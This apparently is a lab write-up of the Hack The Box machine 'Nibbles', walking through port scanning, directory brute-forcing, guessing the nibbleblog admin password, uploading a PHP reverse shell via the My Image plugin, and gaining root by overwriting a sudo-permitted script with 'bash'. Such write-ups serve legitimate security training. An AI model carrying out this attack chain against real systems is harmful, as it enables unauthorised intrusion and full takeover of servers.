Nibbles Walkthrough
This was a pretty fun box and I am excited to share this writeup with you.
As always we start with a Nmap scan using -sC for default scripts and -sV to enumerate versions.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 12:49 EDT
Nmap scan report for 10.10.10.75
Host is up (0.044s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.58 seconds
We don’t get very much from this initial scan, only that port 22 and 80 are open. Since we see an Apache server running on port 80 let’s pull up the web browser and see whats hosted.
Nothing much to see on the home page of our apache server, but let’s run gobuster to enumerate possible directories. We run this command:
gobuster dir -u 10.10.10.75 -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt
Surprisingly, our results come back with nothing but a forbidden server-status directory as shown:
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.75
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/07 12:17:41 Starting gobuster
===============================================================
/server-status (Status: 403)
===============================================================
2020/08/07 12:32:00 Finished
===============================================================Since OpenSSH in my experience is a pretty secure service, and there was nothing that came back on the first gobuster scan, let’s go back to that ‘Hello World’ webpage and inspect the source to see if there is anything of interest there.
We see a comment containing the /nibbleblog/ directory. If we go to 10.10.10.75/nibbleblog we get the following webpage:
Now we are getting somewhere! Just by clicking around on the links, we don’t see any fields that could give use XSS vulnerabilities or even a login page to brute force. With that in mind, let’s run another gobuster but this time with the /nibbleblog/ directory in the URL with this command:
gobuster dir -u 10.10.10.75/nibbleblog/ -w /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txtRunning this command outputs the following:
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.75/nibbleblog
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/04 13:14:38 Starting gobuster
===============================================================
/content (Status: 301)
/themes (Status: 301)
/admin (Status: 301)
/plugins (Status: 301)
/README (Status: 200)
/languages (Status: 301)
===============================================================
2020/08/04 13:29:20 Finished
===============================================================Now we have got some good results! Firstly, let’s check out the /README directory.
We get a lot of information here but the only things that stick out to me are the version numbers and the website to download the nibbleblog software. Let’s jot add that to our notes and continue on exploring the rest of the enumerated directories. /admin seems like a next good step, so let’s pull that up.
We see we have an exposed file system, and this trend will continue throughout the other enumerated directories. After poking around in all the other directories, I have included some of the highlights below:
- This file identifies the username “admin” and lets us know that there is a blacklist associated with the logon of that user.
- Here we see the plugins installed. Plugins could give us a vulnerability to exploit as they can sometimes be less frequently maintained and updated. Keep this in mind for later
We didn’t find any login portal in plain sight while rummaging around in the enumerated directories, so let’s do a google search for the setup of nibbleblog and see if we come up with anything there.
We find a ‘howtoforge’ page describing the setup and install of the nibbleblog software, and this shows us where the login page is located:
/admin.php is our login page. If we had not found this page we could have run another gobuster and appended our file extension with -x. We would have known to add PHP because we can see multiple PHP files in the open directories that we enumerated.
Let’s go to 10.10.10.75/nibbleblog/admin.php and see if the ‘howtoforge’ page had the correct login page.
We see that we do get a login page. Earlier, we got the username “admin” from a file in the enumerated directories, but we also saw that there is a blacklist associated with it. To test this blacklist let’s attempt one login, and check back to see if the blacklist has added our one failed attempt.
We see that our IP 10.10.14.12 has been added to the list, with our fail_count being 1. If not for this blacklist, I would run a burp intruder or hydra brute force against this login page. However, if we did that, we would most likely be banned, since this is an IP based blacklist the only way we could continue attacking this machine would be to hit it from another machine in the same network. To avoid all of this let’s just keep that in the back of our mind and do some research to see if nibbleblog or any of the plugins we found have known vulnerabilities.
A simple google search of “nibbleblog vulnerabilities” yielded multiple CVE details. We see that all of the vulnerabilities that can execute code require the admin username and password. Since we already have found the username “admin” let us do a google search for the default password. We do not see anything right off the bat, so let’s just try the name of the box “nibbles”.
It worked! This further illustrated why strong passwords that cannot be easily guessed are necessary.
Back to our vulnerabilities, #3 on this list stands out because if you remember, we have the my_image plugin installed. This seems simple enough, We can use a PHP reverse shell that is included in Kali by going to the following directory:
/usr/share/webshells/laudanum/phpWe can copy php-reverse-shell.php to our working directory and modify it contain our IP and preferred port.
Once that shell is modified let’s navigate to the my_image plugin to upload it. Clicking on configure under the ‘My Image’ plugin brings us here:
Simply upload our shell by clicking browse, and then ‘Save changes’.Ignore the warnings that pop up onscreen after upload. Set up a Netcat Listener on our preferred port and, just as the description of vulnerability #3 states, we access the file directly by going to: 10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
We got a shell! Now, let’s use some python magic to upgrade our shell to an interactive TTY shell.
We see that we don’t have python, so we tried python3 which was successful. After our python import, we use stty raw -echo to keep from ^C ourselves out of the shell, as well as allowing tab autocomplete to work correctly.
Now for privilege escalation! My go-to after getting a user shell on a Linux box is running sudo -l to see if there are any bad sudo rules that allow us to escalate to a root shell.
nibbler@Nibbles:/$ sudo -l
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler@Nibbles:/$
We see that we can only run one command as root with no password, and that is executing a bash script ‘monitor.sh’. Let’s cd to that directory to see what that monitor script is doing.
nibbler@Nibbles:/home/nibbler$ ls
ls
personal.zip user.txt
nibbler@Nibbles:/home/nibbler$We see the user flag, and then the personal.zip file. Assuming that this zip file will lead us to the monitor.sh script we are looking for let’s unzip it.
nibbler@Nibbles:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ cd personal
cd personal
nibbler@Nibbles:/home/nibbler/personal$ ls
ls
stuff
nibbler@Nibbles:/home/nibbler/personal$ cd stuff
cd stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
ls
monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$If we vi into ‘monitor.sh’ we can attempt to edit it into a simple bash script which we can run as root giving us a root shell.
##############################################################
######################################
# Tecmint_monitor.sh
#
# Written for Tecmint.com for the post www.tecmint.com/linux-s
erver-health-monitoring-script/ #
# If any bug, report us in the link below
#
# Free to use/edit/distribute the code below by
#
# giving proper credit to Tecmint.com and Author
#
#
#
##############################################################
######################################
#! /bin/bash
# unset any variable which system may be using# clear the screen
clear@
1,21 Top2,21 0%
do
3,21 1%
i)iopt=1;;
4,21 3%
*)echo "Invalid arg";;
5,21 4%
done
6,21 5%
if [[ ! -z $iopt ]]
7,21 6%
{
We see this file is used to check the health of the system. However, this is not going to help us so let’s delete each line using ‘dd’ until the file is empty. Once the file is empty type ‘i’ for insert, and type the following two lines:
#!/bin/sh
bash
~
~
~
"monitor.sh" 2L, 15C written
E138: Can't write viminfo file $HOME/.viminfo!
Press ENTER or type command to continuenibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
#!/bin/sh
bash
nibbler@Nibbles:/home/nibbler/personal/stuff$
Once the file is completely we hit ESC to enter back into command mode, then :wq to write and quit vi. We replaced the file with just a single command ‘bash’ to give us a bash session. This, when run with root privileges, will result in us getting root privileges on the machine without having to do another reverse shell.
</personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.shsudo: unable to resolve host Nibbles: Connection timed out
root@Nibbles:/home/nibbler/personal/stuff#
root@Nibbles:/home/nibbler/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)
root@Nibbles:/home/nibbler/personal/stuff#
Success! We have got a root shell using nothing but bad sudo rules, time for a root dance!
Thank you for your time reading this writeup, if you enjoyed it, please let me know!
